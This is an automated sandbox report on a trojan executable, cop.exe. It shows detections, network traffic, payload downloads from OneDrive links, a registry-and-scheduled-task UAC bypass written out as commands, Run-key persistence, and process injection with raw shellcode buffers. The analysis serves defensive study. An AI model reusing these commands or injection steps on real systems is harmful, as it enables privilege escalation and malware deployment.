Summary | ZeroBOX

cop.exe

Emotet Malicious Library Downloader UPX HTTP DNS ScreenShot Create Service KeyLogger Internet API P2P DGA Http API FTP Socket Escalate priviledges Code injection Sniff Audio Steal credential AntiDebug PE File AntiVM PE32
Category Machine Started Completed
FILE s1_win7_x6401 Aug. 19, 2021, 9:39 a.m. Aug. 19, 2021, 10:02 a.m.
Size 665.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 977a62444517295a0cfeb9e6e6f8e27a
SHA256 4b6fdf9cbea14e56b10f5e4d5c4c8fbe34de5454ec1b246814a9464e8c81e314
CRC32 AB4F8704
ssdeep 12288:iFaS5hDku4BW/vgeURfvtSotoaM9wx+DgbvenAAAAAAAAAAAAAAAJAA:2f/J4BeOXSotolw4Dgb
Yara
  • PE_Header_Zero - PE File Signature
  • UPX_Zero - UPX packed file
  • Win32_Trojan_Emotet_2_Zero - Win32 Trojan Emotet
  • Malicious_Library_Zero - Malicious_Library
  • IsPE32 - (no description)

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49200 -> 13.107.42.13:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49201 -> 13.107.42.12:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49202 -> 13.107.42.12:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.101:49200
13.107.42.13:443
C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02 CN=onedrive.com 24:8a:fb:ed:16:0d:11:c8:2f:65:3a:66:ca:f1:6f:60:ad:4c:cc:de
TLSv1
192.168.56.101:49201
13.107.42.12:443
C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02 C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=storage.live.com 77:27:91:d8:e9:91:39:0b:f9:f9:5e:86:3e:37:d5:dc:9d:85:30:49
TLSv1
192.168.56.101:49202
13.107.42.12:443
C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02 C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=storage.live.com 77:27:91:d8:e9:91:39:0b:f9:f9:5e:86:3e:37:d5:dc:9d:85:30:49
TLS 1.3
192.168.56.101:49204
62.102.148.152:8618
None None None

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: C:\Users\Public>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: start
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: /min C:\Users\Public\UKO.bat
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\Public>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: reg
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: delete hkcu\Environment /v windir /f
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\Public>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: reg
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\Public>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: schtasks
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: exit
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: ERROR:
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: The system was unable to find the specified registry key or value.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: The operation completed successfully.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: ERROR:
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: The system cannot find the path specified.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: C:\Users\Public>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: start
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: /min reg delete hkcu\Environment /v windir /f
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: The operation completed successfully.
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
section .itext
packer BobSoft Mini Delphi -> BoB / BobSoft
resource name RDTA
request GET https://onedrive.live.com/download?cid=D6676A9A61E841F3&resid=D6676A9A61E841F3%21124&authkey=AAvFfFUNaaPX5xg
request GET https://a2q8ua.sn.files.1drv.com/y4mHv4FC3w4vu3xhBTq24EbcDs_9Ff-44ScNZJQarXQBccz-PruP8ExelHSqV4xuSj1PR_PPwAx83eslXEvSVPGJLAx6jbxr7NiKLVWjGnwSEAmq2CXsMYx6tAOhpM0N3OVm_TRtfBK4MGUWRaG-J5vdfrM8n39Zd-XWT_D5HNE8x7r8KtWZtkxAPGKBZg38Lwz5ZErWoxPxmYyqtRxi0UCYg/Gehnhmunuodizkcuanobbgrymobqird?download&psid=1
request GET https://a2q8ua.sn.files.1drv.com/y4mOQSKY3HPgDKYEXuiiOOPH_9t-Ca0UvsxWDvkH7aAj7bxUE5NIow9fuBaFmI_887wuFZq2k6AIwvtuiX8o9KIpSbJDgwZDGsdHbrqfxj8jwNBYfdzbt8FbH-8WRSR9Ls1NSB1vsywWLgE1mrKIB_6nU-4-b-B30748uy5_cdIKS7LL8B1hpZszZnzhW3gmiUITmMhVByGnEZSQYv5LDwGbQ/Gehnhmunuodizkcuanobbgrymobqird?download&psid=1
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 656
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73d12000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00640000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 656
region_size: 507904
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x10590000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 656
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 495616
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x10591000
process_handle: 0xffffffff
1 0 0
file C:\Users\Public\KDECO.bat
file C:\Users\Public\UKO.bat
file C:\Users\Public\Libraries\Gehnhmu\Gehnhmu.exe
file C:\Users\Public\Trast.bat
file C:\Users\Public\nest.bat
cmdline C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
cmdline schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 656
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 94208
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x04951000
process_handle: 0xffffffff
1 0 0
section {u'size_of_data': u'0x00023e00', u'virtual_address': u'0x0008b000', u'entropy': 6.861326794775205, u'name': u'.rsrc', u'virtual_size': u'0x00023dc8'} entropy 6.86132679478 description A section with a high entropy has been found
entropy 0.216114457831 description Overall entropy of this PE file is high
description Communication using DGA rule Network_DGA
description Communications use DNS rule Network_DNS
description Communications over RAW Socket rule Network_TCP_Socket
description Create a windows service rule Create_Service
description Record Audio rule Sniff_Audio
description Escalate priviledges rule Escalate_priviledges
description Run a KeyLogger rule KeyLogger
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Communications over HTTP rule Network_HTTP
description Match Windows Inet API call rule Str_Win32_Internet_API
description Communications over FTP rule Network_FTP
description Take ScreenShot rule ScreenShot
description Match Windows Http API call rule Str_Win32_Http_API
description Steal credential rule local_credential_Steal
description File Downloader rule Network_Downloader
description Communications over P2P network rule Network_P2P_Win
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description Communication using DGA rule Network_DGA
description Communications use DNS rule Network_DNS
description Communications over RAW Socket rule Network_TCP_Socket
description Create a windows service rule Create_Service
description Record Audio rule Sniff_Audio
description Escalate priviledges rule Escalate_priviledges
description Run a KeyLogger rule KeyLogger
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Communications over HTTP rule Network_HTTP
description Match Windows Inet API call rule Str_Win32_Internet_API
description Communications over FTP rule Network_FTP
description Take ScreenShot rule ScreenShot
description Match Windows Http API call rule Str_Win32_Http_API
description Steal credential rule local_credential_Steal
description File Downloader rule Network_Downloader
description Communications over P2P network rule Network_P2P_Win
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
cmdline reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "
cmdline schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
cmdline reg delete hkcu\Environment /v windir /f
cmdline C:\Program Files (x86)\internet explorer\ieinstal.exe
buffer Buffer with sha1: ba7f49455bfbb5175d55a152940f2e4e74f7ecb6
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2868
region_size: 507904
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x10590000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000057c
1 0 0

NtAllocateVirtualMemory

process_identifier: 2868
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0x0000057c
1 0 0

NtAllocateVirtualMemory

process_identifier: 2868
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000d0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000057c
1 0 0

NtAllocateVirtualMemory

process_identifier: 2868
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000e0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000057c
1 0 0

NtAllocateVirtualMemory

process_identifier: 2868
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000057c
1 0 0

NtAllocateVirtualMemory

process_identifier: 2868
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00100000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000057c
1 0 0

NtAllocateVirtualMemory

process_identifier: 2868
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00180000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000057c
1 0 0

NtAllocateVirtualMemory

process_identifier: 2868
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00190000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000057c
1 0 0

NtAllocateVirtualMemory

process_identifier: 2868
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x001a0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000057c
1 0 0

NtAllocateVirtualMemory

process_identifier: 2868
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x001b0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000057c
1 0 0

NtAllocateVirtualMemory

process_identifier: 2868
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00270000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000057c
1 0 0

NtAllocateVirtualMemory

process_identifier: 2868
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00280000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000057c
1 0 0
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Gehnhmu reg_value C:\Users\Public\Libraries\umhnheG.url
file C:\Users\Public\nest.bat
Process injection Process 656 created a remote thread in non-child process 2868
Time & API Arguments Status Return Repeated

CreateRemoteThread

thread_identifier: 1436
process_identifier: 2868
function_address: 0x000c0000
flags: 0
stack_size: 0
parameter: 0x00000000
process_handle: 0x0000057c
1 1412 0

CreateRemoteThread

thread_identifier: 2544
process_identifier: 2868
function_address: 0x00100000
flags: 0
stack_size: 0
parameter: 0x000f0000
process_handle: 0x0000057c
1 1412 0

CreateRemoteThread

thread_identifier: 1936
process_identifier: 2868
function_address: 0x001b0000
flags: 0
stack_size: 0
parameter: 0x001a0000
process_handle: 0x0000057c
1 1408 0

CreateRemoteThread

thread_identifier: 1064
process_identifier: 2868
function_address: 0x00280000
flags: 0
stack_size: 0
parameter: 0x00270000
process_handle: 0x0000057c
1 1416 0
Process injection Process 656 manipulating memory of non-child process 2868
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2868
region_size: 507904
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x10590000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000057c
1 0 0

NtAllocateVirtualMemory

process_identifier: 2868
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0x0000057c
1 0 0

NtAllocateVirtualMemory

process_identifier: 2868
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000d0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000057c
1 0 0

NtAllocateVirtualMemory

process_identifier: 2868
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000e0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000057c
1 0 0

NtAllocateVirtualMemory

process_identifier: 2868
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000057c
1 0 0

NtAllocateVirtualMemory

process_identifier: 2868
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00100000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000057c
1 0 0

NtAllocateVirtualMemory

process_identifier: 2868
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00180000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000057c
1 0 0

NtAllocateVirtualMemory

process_identifier: 2868
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00190000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000057c
1 0 0

NtAllocateVirtualMemory

process_identifier: 2868
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x001a0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000057c
1 0 0

NtAllocateVirtualMemory

process_identifier: 2868
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x001b0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000057c
1 0 0

NtAllocateVirtualMemory

process_identifier: 2868
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00270000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000057c
1 0 0

NtAllocateVirtualMemory

process_identifier: 2868
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00280000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000057c
1 0 0
Process injection Process 656 injected into non-child 2868
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: h ÿ hÿ ×Isu˜Õ?wkernel32.dllÿ,û¬Lú¬¾tt|ú¬™Étúÿ`ú¬latQyt°úÿ|ú¬:‰t6;t  û¬mØtÔú¬Ôú¬ÿÿÿÿ@û¬,û¬?•ÿ$•û¬,%•äú¬€û¬QA–YA–Pû¬äE•
base_address: 0x000c0000
process_identifier: 2868
process_handle: 0x0000057c
1 1 0

WriteProcessMemory

buffer: GetProcAddress
base_address: 0x000d0000
process_identifier: 2868
process_handle: 0x0000057c
1 1 0

WriteProcessMemory

buffer: kernel32.dll
base_address: 0x000e0000
process_identifier: 2868
process_handle: 0x0000057c
1 1 0

WriteProcessMemory

buffer: ˜Õ?w"suEsu
base_address: 0x000f0000
process_identifier: 2868
process_handle: 0x0000057c
1 1 0

WriteProcessMemory

buffer: U‹ìƒÄìVW‹E‹ð}쥥¥¥¥ÿuøÿUôÿuüPÿUðPÿUì_^‹å]‹ÀU‹ìƒÄàSVW‹ù‰Uü‹Ø‹u3À‰EøhÄI–hØI–èEÿÿPèGÿÿ‰EèhèI–hØI–è-ÿÿPè/ÿÿ‰EähøI–hØI–èÿÿPèÿÿ‰Eàƒþu‰}ðë‹Î‹×‹ÃèGüÿÿ‰Eð‹Uü‹Ãè¢ûÿÿ‰EìjjMàºÐH–‹Ãè`üÿÿ‹Ø…ÛtjÿSè¦ÿÿEôPSè„ÿÿ‹Eô‰Eø‹Eø_^[‹å]ÂGetModuleHandleAkernel32.dllGetProcAddressExitThreadU‹ìƒÄìS‰Eü‹Eü‰Eø‹E‹@ü‹€¤‰EôëU‹Eø‹@ƒèÑè‰Eì‹EøƒÀ‰Eð‹UìJ…Òr0B‹Eðf‹öÅðt‹E‹@ô‹]øfáÿ·ÉÁ‹M‹IøƒEðJuыEð‰Eø‹Eø+Eü;Eôr [‹å]Ã
base_address: 0x00100000
process_identifier: 2868
process_handle: 0x0000057c
1 1 0

WriteProcessMemory

buffer: LoadLibraryA
base_address: 0x00180000
process_identifier: 2868
process_handle: 0x0000057c
1 1 0

WriteProcessMemory

buffer: kernel32.dll
base_address: 0x00190000
process_identifier: 2868
process_handle: 0x0000057c
1 1 0

WriteProcessMemory

buffer: ˜Õ?w"suEsu
base_address: 0x001a0000
process_identifier: 2868
process_handle: 0x0000057c
1 1 0

WriteProcessMemory

buffer: U‹ìƒÄìVW‹E‹ð}쥥¥¥¥ÿuøÿUôÿuüPÿUðPÿUì_^‹å]‹ÀU‹ìƒÄàSVW‹ù‰Uü‹Ø‹u3À‰EøhÄI–hØI–èEÿÿPèGÿÿ‰EèhèI–hØI–è-ÿÿPè/ÿÿ‰EähøI–hØI–èÿÿPèÿÿ‰Eàƒþu‰}ðë‹Î‹×‹ÃèGüÿÿ‰Eð‹Uü‹Ãè¢ûÿÿ‰EìjjMàºÐH–‹Ãè`üÿÿ‹Ø…ÛtjÿSè¦ÿÿEôPSè„ÿÿ‹Eô‰Eø‹Eø_^[‹å]ÂGetModuleHandleAkernel32.dllGetProcAddressExitThreadU‹ìƒÄìS‰Eü‹Eü‰Eø‹E‹@ü‹€¤‰EôëU‹Eø‹@ƒèÑè‰Eì‹EøƒÀ‰Eð‹UìJ…Òr0B‹Eðf‹öÅðt‹E‹@ô‹]øfáÿ·ÉÁ‹M‹IøƒEðJuыEð‰Eø‹Eø+Eü;Eôr [‹å]Ã
base_address: 0x001b0000
process_identifier: 2868
process_handle: 0x0000057c
1 1 0

WriteProcessMemory

buffer: Y$Y
base_address: 0x00270000
process_identifier: 2868
process_handle: 0x0000057c
1 1 0

WriteProcessMemory

buffer: U‹ìƒÄø‹E‹‰Uø‹P‰Uü1ÀPjÿuøÿUüYY]@U‹ìƒÄÔSVW‹ú‹ðEԋô?–è5ÿÿ3ÀUh½H–dÿ0d‰ ÆEÿ‹G<ljEô»Ãj@h0‹Eô‹@PP‹Eô‹@4ÃPèÿÿ‰Eðƒ}ðt0h€j‹EðPèÿÿj@h0‹Eô‹@PP‹Eô‹@4ÃPVèâÿÿ‰Eðƒ}ðuû0v—EÔP‹Ï‹Uð‹Æ蝋EԅÀt7‰Eè‹Uà‰UìUøR‹UØRP‹EðPVèÖÿÿjjM躈G–‹Æè_ýÿÿ…ÀtÆEÿ3ÀZYYd‰hÄH–Eԋô?–èÿÿÃ
base_address: 0x00280000
process_identifier: 2868
process_handle: 0x0000057c
1 1 0
process cop.exe useragent zipo
process cop.exe useragent aswe
Process injection Process 3052 resumed a thread in remote process 2320
Process injection Process 2740 resumed a thread in remote process 2216
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000088
suspend_count: 0
process_identifier: 2320
1 0 0

NtResumeThread

thread_handle: 0x00000088
suspend_count: 0
process_identifier: 2216
1 0 0
Lionic Trojan.Win32.Generic.4!c
McAfee Artemis!977A62444517
Cylance Unsafe
Alibaba Trojan:Win32/Injector.6d04bec9
Cybereason malicious.31ee59
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Win32/Injector.EPVD
Paloalto generic.ml
Kaspersky UDS:DangerousObject.Multi.Generic
APEX Malicious
Sophos ML/PE-A
McAfee-GW-Edition BehavesLike.Win32.AdwareDealPly.jh
Kingsoft Win32.Hack.Undef.(kcloud)
Microsoft Trojan:Win32/Sabsik.FL.B!ml
Cynet Malicious (score: 100)
Malwarebytes MachineLearning/Anomalous.94%
Avast Win32:Trojan-gen
Fortinet W32/Kryptik.EPYG!tr
AVG Win32:Trojan-gen
CrowdStrike win/malicious_confidence_70% (W)
Qihoo-360 Win32/Heur.Generic.HwUBW3sA
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000160
suspend_count: 1
process_identifier: 656
1 0 0

CreateProcessInternalW

thread_identifier: 3040
thread_handle: 0x00000578
process_identifier: 2868
current_directory:
filepath:
track: 1
command_line: C:\Program Files (x86)\internet explorer\ieinstal.exe
filepath_r:
stack_pivoted: 0
creation_flags: 68 (CREATE_SUSPENDED|IDLE_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x0000057c
1 1 0

NtAllocateVirtualMemory

process_identifier: 2868
region_size: 507904
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x10590000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000057c
1 0 0

NtAllocateVirtualMemory

process_identifier: 2868
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0x0000057c
1 0 0

WriteProcessMemory

buffer: h ÿ hÿ ×Isu˜Õ?wkernel32.dllÿ,û¬Lú¬¾tt|ú¬™Étúÿ`ú¬latQyt°úÿ|ú¬:‰t6;t  û¬mØtÔú¬Ôú¬ÿÿÿÿ@û¬,û¬?•ÿ$•û¬,%•äú¬€û¬QA–YA–Pû¬äE•
base_address: 0x000c0000
process_identifier: 2868
process_handle: 0x0000057c
1 1 0

NtAllocateVirtualMemory

process_identifier: 2868
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000d0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000057c
1 0 0

WriteProcessMemory

buffer: GetProcAddress
base_address: 0x000d0000
process_identifier: 2868
process_handle: 0x0000057c
1 1 0

NtAllocateVirtualMemory

process_identifier: 2868
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000e0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000057c
1 0 0

WriteProcessMemory

buffer: kernel32.dll
base_address: 0x000e0000
process_identifier: 2868
process_handle: 0x0000057c
1 1 0

NtAllocateVirtualMemory

process_identifier: 2868
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000057c
1 0 0

WriteProcessMemory

buffer: ˜Õ?w"suEsu
base_address: 0x000f0000
process_identifier: 2868
process_handle: 0x0000057c
1 1 0

NtAllocateVirtualMemory

process_identifier: 2868
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00100000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000057c
1 0 0

WriteProcessMemory

buffer: U‹ìƒÄìVW‹E‹ð}쥥¥¥¥ÿuøÿUôÿuüPÿUðPÿUì_^‹å]‹ÀU‹ìƒÄàSVW‹ù‰Uü‹Ø‹u3À‰EøhÄI–hØI–èEÿÿPèGÿÿ‰EèhèI–hØI–è-ÿÿPè/ÿÿ‰EähøI–hØI–èÿÿPèÿÿ‰Eàƒþu‰}ðë‹Î‹×‹ÃèGüÿÿ‰Eð‹Uü‹Ãè¢ûÿÿ‰EìjjMàºÐH–‹Ãè`üÿÿ‹Ø…ÛtjÿSè¦ÿÿEôPSè„ÿÿ‹Eô‰Eø‹Eø_^[‹å]ÂGetModuleHandleAkernel32.dllGetProcAddressExitThreadU‹ìƒÄìS‰Eü‹Eü‰Eø‹E‹@ü‹€¤‰EôëU‹Eø‹@ƒèÑè‰Eì‹EøƒÀ‰Eð‹UìJ…Òr0B‹Eðf‹öÅðt‹E‹@ô‹]øfáÿ·ÉÁ‹M‹IøƒEðJuыEð‰Eø‹Eø+Eü;Eôr [‹å]Ã
base_address: 0x00100000
process_identifier: 2868
process_handle: 0x0000057c
1 1 0

NtAllocateVirtualMemory

process_identifier: 2868
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00180000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000057c
1 0 0

WriteProcessMemory

buffer: LoadLibraryA
base_address: 0x00180000
process_identifier: 2868
process_handle: 0x0000057c
1 1 0

NtAllocateVirtualMemory

process_identifier: 2868
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00190000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000057c
1 0 0

WriteProcessMemory

buffer: kernel32.dll
base_address: 0x00190000
process_identifier: 2868
process_handle: 0x0000057c
1 1 0

NtAllocateVirtualMemory

process_identifier: 2868
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
